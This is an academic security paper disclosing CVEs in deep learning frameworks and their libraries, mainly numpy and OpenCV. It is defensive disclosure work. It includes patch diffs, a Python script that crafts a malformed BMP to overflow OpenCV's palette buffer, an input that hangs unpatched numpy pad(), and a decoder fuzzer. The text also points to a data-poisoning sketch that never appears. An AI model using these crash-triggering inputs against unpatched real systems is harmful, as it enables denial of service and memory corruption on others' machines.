
Security Risks in Deep Learning Implementations

Qixue Xiao¹, Kang Li², Deyue Zhang¹, Weilin Xu³

¹Qihoo 360 Security Research Lab, ²University of Georgia, ³University of Virginia

arXiv:1711.11008v1 [cs.CR] 29 Nov 2017

Abstract—Advances in deep learning algorithms overshadow their security risk in software implementations. This paper discloses a set of vulnerabilities in popular deep learning frameworks including Caffe, TensorFlow, and Torch. In contrast to the small code size of deep learning models, these deep learning frameworks are complex and carry heavy dependencies on numerous open source packages. This paper considers the risks caused by these vulnerabilities by studying their impact on common deep learning applications such as voice recognition and image classification. By exploiting these framework implementations, attackers can launch denial-of-service attacks that crash or hang a deep learning application, or control-flow hijacking attacks that lead to either system compromise or recognition evasion. The goal of this paper is to draw attention to the software implementations and to call for community efforts to improve the security of deep learning frameworks.

I. INTRODUCTION

Artificial intelligence has become a focus of attention in recent years, partially due to the success of deep learning applications. Advances in GPUs and deep learning algorithms, along with large datasets, allow deep learning algorithms to address real-world problems in many areas, from image classification to health care prediction, and from automated game playing to reverse engineering. Many scientific and engineering fields are passionately embracing deep learning.

This passionate adoption of new machine learning algorithms has sparked the development of multiple deep learning frameworks, such as Caffe [3], TensorFlow [1], and Torch [6]. These frameworks enable fast development of deep learning applications. A framework provides common building blocks for the layers of a neural network. By using these frameworks, developers can focus on model design and application-specific logic without worrying about the coding details of input parsing, matrix multiplication, or GPU optimizations.

In this paper, we examine the implementations of three popular deep learning frameworks: Caffe, TensorFlow, and Torch. We collected their software dependencies based on the sample applications released along with each framework. The implementations of these frameworks are complex (often hundreds of thousands of lines of code) and are often built over numerous third-party software packages, such as image and video processing and scientific computation libraries.

A common challenge for the software industry is that implementation complexity often leads to software vulnerabilities. Deep learning frameworks face the same challenge. Through our examination, we found multiple dozens of implementation flaws. Among them, 15 have been assigned CVE numbers. The flaws cover multiple common types of software bugs, such as heap overflow, integer overflow, and use-after-free.

We made a preliminary study of the threats and risks caused by these vulnerabilities. With a wide variety of deep learning applications being built over these frameworks, we consider a range of attack surfaces, including malformed data in application inputs, training data, and models. The potential consequences of these vulnerabilities include denial-of-service attacks, evasion of classification, and even system compromise. This paper provides a brief summary of these vulnerabilities and the potential risks that we anticipate for deep learning applications built over these frameworks.

Through our preliminary study of three deep learning frameworks, we make the following contributions:

• This paper exposes the dependency complexity of popular deep learning frameworks.
• This paper presents a preliminary study of the attack surface for deep learning applications.
• Through this paper, we show that multiple vulnerabilities exist in the implementations of these frameworks.
• We also study the impact of these vulnerabilities and describe the potential security risks to applications built on these vulnerable frameworks.

II. LAYERED IMPLEMENTATION OF DEEP LEARNING APPLICATIONS

Deep learning frameworks enable fast development of machine learning applications. Equipped with pre-implemented neural network layers, deep learning frameworks allow developers to focus on application logic. Developers can design, build, and train scenario-specific models on a deep learning framework without worrying about the coding details of input parsing, matrix multiplication, or GPU optimizations.

Fig. 1: The Layered Approach for Deep Learning Applications. (The figure shows three layers: DL applications at the top, consisting of program logic, model, and data; DL frameworks in the middle, such as TensorFlow, Caffe, Torch, and Theano; and framework dependencies at the bottom, such as GNU libc and NumPy.)
The exact implementation of deep learning applications varies, but those built on deep learning frameworks usually consist of software in three layers. Figure 1 shows the layers of a typical deep learning application. The top layer contains the application logic, the deep learning model, and the corresponding data resulting from the training stage. These components are usually visible to the developers. The middle layer is the implementation of the deep learning framework, such as tensor components and various filters. The interface between the top two layers is usually specified in the programming language used to implement the middle layer. For example, the programming language interfaces are C++, Python, and Lua for Caffe, TensorFlow, and Torch respectively. The bottom layer consists of building blocks used by the frameworks. These building blocks are components that accomplish tasks such as video and audio processing and model representation (e.g. protobuf). The selection of building blocks varies depending on the design of a framework. For example, TensorFlow contains its own implementations of video and image processing built over third-party packages such as librosa and numpy, whereas Caffe chooses to directly use open source libraries, such as OpenCV and Libjasper, to parse media inputs. Even though the bottom and middle layers are often invisible to the developers of deep learning applications, these components are essential parts of deep learning applications.
Table I provides some basic statistics on the implementations of the deep learning frameworks. In our study, the versions of TensorFlow and Caffe that we analyzed are 1.2.1 and 1.0. The study also includes Torch7. As the default Torch package only supports a limited set of image formats, we chose to study the version of Torch7 combined with the OpenCV bindings [9], which support various image formats such as bmp, gif, and tiff.

We measure the complexity of a deep learning framework by two metrics: the lines of code and the number of software dependency packages. We count the lines of code using the cloc tool on Linux. As described in Table I, none of these code bases is small. TensorFlow has more than 887 thousand lines of code, Torch has more than 590K lines of code, and Caffe has more than 127K. In addition, they all depend on numerous third-party packages. Caffe is based on more than 130 dependent libraries (measured by the Linux ldd utility), and TensorFlow and Torch depend on 97 Python modules and 48 Lua modules respectively, counted from the import or require statements.

TABLE I: DL Frameworks and Their Dependencies

DL Framework   Lines of Code   Number of Dep. Packages   Sample Packages
TensorFlow     887K+           97                        librosa, numpy
Caffe          127K+           137                       libprotobuf, libz, opencv
Torch          590K+           48                        xlua, qtsvg, opencv
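The counts in Table I can be approximated with simple tooling. The sketch below is a minimal illustration of the method described above (ldd for native library dependencies, import scanning for Python modules); the library path and source directory are placeholders to be supplied by the reader, not paths from our experiments.

# Minimal sketch of the dependency-counting method described above.
import re
import subprocess
from pathlib import Path

def count_ldd_deps(shared_lib):
    """Count shared-library dependencies reported by the Linux ldd utility."""
    out = subprocess.run(["ldd", shared_lib], capture_output=True, text=True, check=True)
    deps = {line.split()[0] for line in out.stdout.splitlines() if line.strip()}
    return len(deps)

def count_python_imports(src_root):
    """Count distinct top-level modules pulled in via 'import' or 'from ... import'."""
    pattern = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_]\w*)", re.MULTILINE)
    modules = set()
    for py_file in Path(src_root).rglob("*.py"):
        modules.update(pattern.findall(py_file.read_text(errors="ignore")))
    return len(modules)

if __name__ == "__main__":
    print(count_ldd_deps("/usr/lib/libcaffe.so"))        # hypothetical library path
    print(count_python_imports("tensorflow/examples"))   # hypothetical source tree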
A layered approach is a common practice in software engineering. Layering does not introduce flaws directly, but complexity in general increases the risk of vulnerabilities, and any flaw in the framework or its building blocks affects the applications built on it. The next section of this paper presents some preliminary findings of flaws in these implementations.

III. VULNERABILITIES AND THREATS

While there are numerous discussions about deep learning and artificial intelligence applications, the security of these applications draws less attention. To illustrate the risks and threats related to deep learning applications, we first present the attack surfaces of machine learning applications and then consider the types of risks resulting from implementation vulnerabilities.

A. Attack Surfaces

Without loss of generality, we use MNIST handwritten digit recognition [11] as an example to consider the attack surface of deep learning applications. We believe an image recognition application like MNIST can be exploited from the following three angles:

• Attack Surface 1 – Malformed Input Image: Many current deep learning applications, once trained, work on input data for classification and recognition purposes. For an application that reads inputs from files or the network, attackers can potentially construct malformed input. This applies to the MNIST image recognition application, which reads inputs from files. The attack surface is significantly reduced for applications that take input from a sensor such as a directly connected camera, but the risk of malformed input is not eliminated in those cases, and we discuss it in the next section.

• Attack Surface 2 – Malformed Training Data: Image recognition applications take training samples, which can be polluted or mislabeled if the training data come from external sources. This is often known as a data poisoning attack. A data poisoning attack does not need to rely on software vulnerabilities. However, flaws in implementations can make data poisoning easier (or at least harder to detect). For example, we have observed inconsistencies between the image parsing procedure in a framework and in common desktop applications (such as image viewers). This inconsistency can enable sneaky data pollution without being noticed by the people managing the training process (see the sketch after this list).

• Attack Surface 3 – Malformed Models: Deep learning applications can also be attacked if the developers use models developed by others. Although many developers design and build models from scratch, many models are made available for developers with less sophisticated machine learning knowledge to use. In such cases, these models become potential sources that can be manipulated by attackers. Similar to data poisoning attacks, attackers can threaten applications carrying external models without exploiting any vulnerabilities. However, implementation flaws, such as a vulnerability in the model parsing code, help attackers hide malformed models and make the threat more realistic.

Certainly, the attack surface varies for each specific application, but we believe these three attack surfaces cover most of the space from which attackers threaten deep learning applications.
B. Types of Threats

We have studied several deep learning frameworks and found over a dozen implementation flaws. Table II summarizes the portion of these flaws that have been assigned CVE numbers. These implementation flaws make applications vulnerable to a wide range of threats. Due to space limitations, we only present here the threats caused by malformed input, and we assume the applications take input from files or networks.

TABLE II: CVEs Found for DL Frameworks and Dependencies

DL Framework   Dep. Package   CVE-ID           Potential Threats
TensorFlow     numpy          CVE-2017-12852   DoS
TensorFlow     wave.py        CVE-2017-14144   DoS
Caffe          libjasper      CVE-2017-9782    heap overflow
Caffe          openEXR        CVE-2017-12596   crash
Caffe/Torch    opencv         CVE-2017-12597   heap overflow
Caffe/Torch    opencv         CVE-2017-12598   crash
Caffe/Torch    opencv         CVE-2017-12599   crash
Caffe/Torch    opencv         CVE-2017-12600   DoS
Caffe/Torch    opencv         CVE-2017-12601   crash
Caffe/Torch    opencv         CVE-2017-12602   DoS
Caffe/Torch    opencv         CVE-2017-12603   crash
Caffe/Torch    opencv         CVE-2017-12604   crash
Caffe/Torch    opencv         CVE-2017-12605   crash
Caffe/Torch    opencv         CVE-2017-12606   crash
Caffe/Torch    opencv         CVE-2017-14136   integer overflow

• Threat 1 – DoS Attacks: The most common vulnerabilities that we found in deep learning frameworks are software bugs that cause programs to crash, enter an infinite loop, or exhaust all memory. The direct threat caused by such bugs is a denial-of-service attack against applications running on top of the framework. The listing below shows the patch to a bug found in the numpy Python package, which is a building block for the TensorFlow framework. The numpy package is used for matrix multiplication and related processing and is commonly used by applications built over TensorFlow. The particular bug occurs in the pad() function, which contains a while loop that does not terminate for inputs not anticipated by the developers. The flaw occurs because the variable safe_pad in the loop condition is set to a negative value when an empty vector is passed from a caller. Because of this bug, we showed that popular sample TensorFlow applications, such as the Urban Sound Classification application [7], hang on specially crafted sound files.

Listing 1: numpy patch example

--- a/numpy/lib/arraypad.py
+++ b/numpy/lib/arraypad.py
@@ -1406,7 +1406,10 @@ def pad(array, pad_width, mode, **kwargs):
             newmat = _append_min(newmat, pad_after, chunk_after, axis)

     elif mode == 'reflect':
-        for axis, (pad_before, pad_after) in enumerate(pad_width):
+        if narray.size == 0:
+            raise ValueError("There aren't any elements to reflect in 'array'!")
+
+        for axis, (pad_before, pad_after) in enumerate(pad_width):
             ... ...
             method = kwargs['reflect_type']
             safe_pad = newmat.shape[axis] - 1
             while ((pad_before > safe_pad) or (pad_after > safe_pad)):
             ... ...
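To make the trigger condition concrete, the sketch below feeds pad() the kind of input the patch guards against. It assumes a patched numpy, which raises ValueError; an unpatched version (prior to the fix above) would instead spin in the while loop and hang the caller.

# Minimal sketch of the DoS condition fixed by the patch above.
# On a patched numpy, padding an empty array in 'reflect' mode raises an error;
# on an unpatched version, safe_pad becomes negative and the loop never exits,
# so do not run this against a vulnerable installation expecting it to return.
import numpy as np

empty = np.array([])            # stands in for a malformed or empty feature vector
try:
    np.pad(empty, pad_width=4, mode="reflect")
except ValueError as err:
    print("patched numpy rejects the input:", err)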
• Threat 2 – Evasion Attacks: Evasion attacks occur when an attacker can construct an input that should be classified as one category but is misclassified by the deep learning application as a different category. Machine learning researchers have spent a considerable amount of research effort on generating evasion inputs through adversarial learning methods [5, 10]. When faced with a vulnerable deep learning framework, attackers can instead achieve the goal of evasion by exploiting software bugs. We found multiple memory corruption bugs in deep learning frameworks that can potentially cause applications to generate wrong classification outputs. Attackers can achieve evasion by exploiting these bugs in two ways: 1) overwriting classification results through vulnerabilities that give attackers the ability to modify specific memory content, or 2) hijacking the application control flow to skip or reorder model execution.

The listing below shows an out-of-bounds write vulnerability and the corresponding patch. The data pointer can be set to an arbitrary value in the readData function, and attacker-specified data can then be written to the address pointed to by data, which can potentially overwrite classification results.

Listing 2: OpenCV patch example

bool BmpDecoder::readData( Mat& img )
{
    uchar* data = img.ptr();
    ....
    if( m_origin == IPL_ORIGIN_BL )
    {
        data += (m_height - 1)*(size_t)step; // can result in an out-of-bounds write
        step = -step;
    }
    ....
    if( color )
        WRITE_PIX( data, clr[t] );
    else
        *data = gray_clr[t];
}

index 3b23662..5ee4ca3 100644
--- a/modules/imgcodecs/src/loadsave.cpp
+++ b/modules/imgcodecs/src/loadsave.cpp
+static Size validateInputImageSize(const Size& size)
+{
+    CV_Assert(size.width > 0);
+    CV_Assert(size.width <= CV_IO_MAX_IMAGE_WIDTH);
+    CV_Assert(size.height > 0);
+    CV_Assert(size.height <= CV_IO_MAX_IMAGE_HEIGHT);
+    uint64 pixels = (uint64)size.width * (uint64)size.height;
+    CV_Assert(pixels <= CV_IO_MAX_IMAGE_PIXELS);
+    return size;
+}

@@ -408,14 +426,26 @@ imread_( const String& filename, int flags, int hdrtype, Mat* mat=0 )
     // established the required input image size
-    CvSize size;
-    size.width = decoder->width();
-    size.height = decoder->height();
+    Size size = validateInputImageSize(Size(decoder->width(), decoder->height()));

• Threat 3 – System Compromise: For software bugs that allow an attacker to hijack control flow, attackers can potentially leverage the bug to remotely compromise the system that hosts the deep learning application. This occurs when deep learning applications run as a cloud service that takes input feeds from the network.

The listing below shows a patch to a simple buffer overflow found in the OpenCV library. OpenCV is a computer vision library designed for computational efficiency with a strong focus on real-time applications, and it supports deep learning frameworks such as TensorFlow, Torch/PyTorch, and Caffe. The buffer overflow occurs in the readHeader function in grfmt_bmp.cpp. The variable m_palette represents a buffer of 256*4 bytes; however, the value of clrused comes from the input image and can be set to an arbitrary value by attackers. Therefore, a malformed BMP image can cause a buffer overflow in the getBytes() call. Through our investigation, this vulnerability provides the ability to make arbitrary memory writes, and we have successfully forced sample programs (such as cpp_classification [2] in Caffe) to spawn a remote shell based on our crafted image input.
While doing this work, we found that another group of researchers [8] has also studied the vulnerabilities and impact of OpenCV on machine learning applications. Although their idea of exploring OpenCV for system compromise shares a similar goal with our effort, they did not find or release vulnerabilities that are confirmed by the OpenCV developers [4]. In contrast, our findings have been confirmed by the corresponding developers, and many of them have been patched based on our suggestions. In addition, we have developed proof-of-concept exploits that successfully demonstrate remote system compromise (by remotely gaining a shell) through the vulnerabilities we found.

Listing 3: OpenCV patch example

index 86cacd3..257f97c 100644
--- a/modules/imgcodecs/src/grfmt_bmp.cpp
+++ b/modules/imgcodecs/src/grfmt_bmp.cpp
@@ -118,8 +118,9 @@ bool BmpDecoder::readHeader()
             if( m_bpp <= 8 )
             {
-                memset( m_palette, 0, sizeof(m_palette));
-                m_strm.getBytes( m_palette, (clrused == 0? 1<<m_bpp : clrused)*4 );
+                CV_Assert(clrused < 256);
+                memset(m_palette, 0, sizeof(m_palette));
+                m_strm.getBytes(m_palette, (clrused == 0? 1<<m_bpp : clrused)*4 );
                 iscolor = IsColorPalette( m_palette, m_bpp );
             }
             else if( m_bpp == 16 && m_rle_code == BMP_BITFIELDS )
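For illustration, the sketch below crafts the kind of BMP header that exercises this code path: an 8-bpp image whose biClrUsed field far exceeds the 256-entry palette buffer. The script only writes a file (the output name is our placeholder); per the analysis above, parsing such a file with an unpatched OpenCV build overflows m_palette, while a patched build rejects it at the CV_Assert.

# Minimal sketch: write a BMP whose "colors used" (biClrUsed) field is absurdly
# large. In the unpatched readHeader(), clrused*4 bytes are read into the fixed
# 256*4-byte m_palette buffer, overflowing it; patched builds assert clrused < 256.
import struct

def craft_bmp(path, clrused=0x10000):
    width, height, bpp = 2, 2, 8
    info = struct.pack("<IiiHHIIiiII",
                       40, width, height, 1, bpp,   # BITMAPINFOHEADER, 8 bits per pixel
                       0, 0, 0, 0,
                       clrused, 0)                   # biClrUsed controlled by the attacker
    palette = b"\x00" * (256 * 4)                    # nominal palette
    pixels = b"\x00" * (4 * height)                  # two rows, each padded to 4 bytes
    offset = 14 + len(info) + len(palette)
    header = struct.pack("<2sIHHI", b"BM", offset + len(pixels), 0, 0, offset)
    with open(path, "wb") as f:
        f.write(header + info + palette + pixels)

if __name__ == "__main__":
    craft_bmp("malformed.bmp")                       # hypothetical output name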

IV. DISCUSSION AND FUTURE WORK

The previous section presents software vulnerabilities in the implementations of deep learning frameworks. These vulnerabilities are only one set of factors affecting overall application security. There are multiple other factors to consider, such as where an application takes its input from and whether the training data are well formed, that also affect the security risks. We briefly discuss a few related issues here.

A. Security Risks for Applications in Closed Environments

Many sample deep learning applications are designed to be used in a closed environment, in which the application acquires input directly from sensors closely coupled with the application. For example, a machine learning implementation running on a camera only takes data output from the built-in camera sensor. Arguably, the risk of malformed input is lower than for an application that takes input from the network or from files controlled by users. However, a closely coupled sensor does not eliminate the threat of malformed input. For example, there are risks associated with sensor integrity, which can be compromised. If the sensor communicates with a cloud server where the deep learning application runs, attackers could reverse-engineer the communication protocol and directly attack the backend.

B. Detecting Vulnerabilities in Deep Learning Applications

We applied traditional bug finding methods, especially fuzzing, to find the software vulnerabilities presented in this paper. We expect all conventional static and dynamic analysis methods to apply to deep learning framework implementations. However, we found that coverage-based fuzzing tools are not ideal for testing deep learning applications, especially for discovering errors in the execution of models. Taking the MNIST image classifier as an example, almost all images cover the same execution path because all inputs go through the same layers of calculation. Therefore, simple errors such as divide-by-zero would not be easily found by coverage-based fuzzers, since the path coverage feedback is less effective in this case.
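As a concrete illustration of this input-layer fuzzing, and of why coverage feedback adds little once execution reaches the model, the sketch below is a bare-bones mutation fuzzer over an image decoder. It assumes OpenCV's Python bindings and a seed image supplied by the reader; it is not the actual harness used in our experiments.

# Bare-bones mutation fuzzer for the image-parsing layer: flip random bytes in a
# seed image and feed the result to the decoder, watching for errors or crashes.
# Model execution itself contributes almost no new coverage, so the interesting
# bugs tend to live in parsing code rather than in the layers of the model.
import random

import numpy as np
import cv2

def mutate(data: bytes, flips: int = 8) -> bytes:
    buf = bytearray(data)
    for _ in range(flips):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

def fuzz_decoder(seed_path: str, iterations: int = 1000) -> None:
    seed = open(seed_path, "rb").read()
    for i in range(iterations):
        sample = mutate(seed)
        try:
            img = cv2.imdecode(np.frombuffer(sample, dtype=np.uint8), cv2.IMREAD_COLOR)
            if img is None:
                continue                        # decoder cleanly rejected the mutated bytes
        except cv2.error:
            print(f"iteration {i}: decoder raised an error")   # candidate bug input
            # a hard crash (e.g. SIGSEGV) would terminate the process instead

if __name__ == "__main__":
    fuzz_decoder("seed.bmp")                    # hypothetical seed image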
C. Security Risks due to Logical Errors or Data Manipulation

Our preliminary work focused on "conventional" software vulnerabilities that lead to program crashes, control-flow hijacking, or denial of service. It is interesting to consider whether there are types of bugs specific to deep learning that need special detection methods. Evasion attacks and data poisoning attacks do not have to rely on conventional software flaws such as buffer overflows. It is enough to create an evasion if there are mistakes that allow training or classification to use more data than an application is supposed to have. Such a mismatch in data consumption can be caused by a small inconsistency in data parsing between the framework implementation and conventional desktop software.

One additional challenge in detecting logical errors in deep learning applications is the difficulty of differentiating insufficient training from intended manipulation, which aims to have a particular group of inputs misclassified. We plan to investigate methods to detect such types of errors.

V. CONCLUSION

The purpose of this work is to raise awareness of the security threats caused by software implementation mistakes. Deep learning frameworks are complex software, and thus it is almost unavoidable for them to contain implementation bugs. This paper presents an overview of the implementation vulnerabilities and the corresponding risks in popular deep learning frameworks. We discovered multiple vulnerabilities in popular deep learning frameworks and the libraries they use. The types of potential risks include denial of service, evasion of detection, and system compromise. Although closed applications are less risky in terms of their control of the input, they are not completely immune to these attacks. Considering the opaque nature of deep learning applications, which buries the implicit logic in training data, the security risks caused by implementation flaws can be difficult to detect. We hope our preliminary results in this paper can remind researchers not to forget conventional threats and to actively look for ways to detect flaws in the software implementations of deep learning applications.

REFERENCES

[1] Gardener and Benoitsteiner, "An open-source software library for Machine Intelligence," https://www.tensorflow.org/, 2017.
[2] Y. Jia, "Classifying ImageNet: using the C++ API," https://github.com/BVLC/caffe/tree/master/examples/cpp_classification, 2017.
[3] Y. Jia, E. Shelhamer, J. Donahue, S. Karayev, J. Long, R. Girshick, S. Guadarrama, and T. Darrell, "Caffe: Convolutional architecture for fast feature embedding," arXiv preprint arXiv:1408.5093, 2014.
[4] OpenCV Developers, "OpenCV issue 5956," https://github.com/opencv/opencv/issues/5956, 2017, accessed 2017-09-03.
[5] N. Papernot, P. McDaniel, I. Goodfellow, S. Jha, Z. B. Celik, and A. Swami, "Practical black-box attacks against machine learning," in Proceedings of the 2017 ACM Asia Conference on Computer and Communications Security (ASIA CCS '17). New York, NY, USA: ACM, 2017, pp. 506–519.
[6] Ronan, Clément, Koray, and Soumith, "Torch: A scientific computing framework for LuaJIT," http://torch.ch/, 2017.
[7] A. Saeed, "Urban Sound Classification," https://devhub.io/zh/repos/aqibsaeed-Urban-Sound-Classification, 2017.
[8] R. Stevens, O. Suciu, A. Ruef, S. Hong, M. W. Hicks, and T. Dumitras, "Summoning demons: The pursuit of exploitable bugs in machine learning," CoRR, vol. abs/1701.04739, 2017. [Online]. Available: http://arxiv.org/abs/1701.04739
[9] VisionLabs, "OpenCV bindings for LuaJIT+Torch," https://github.com/VisionLabs/torch-opencv, 2017.
[10] W. Xu, Y. Qi, and D. Evans, "Automatically evading classifiers," in Network and Distributed System Security Symposium, 2016.
[11] Y. LeCun, C. Cortes, and C. J. C. Burges, "The MNIST database of handwritten digits," http://yann.lecun.com/exdb/mnist/, 2017.
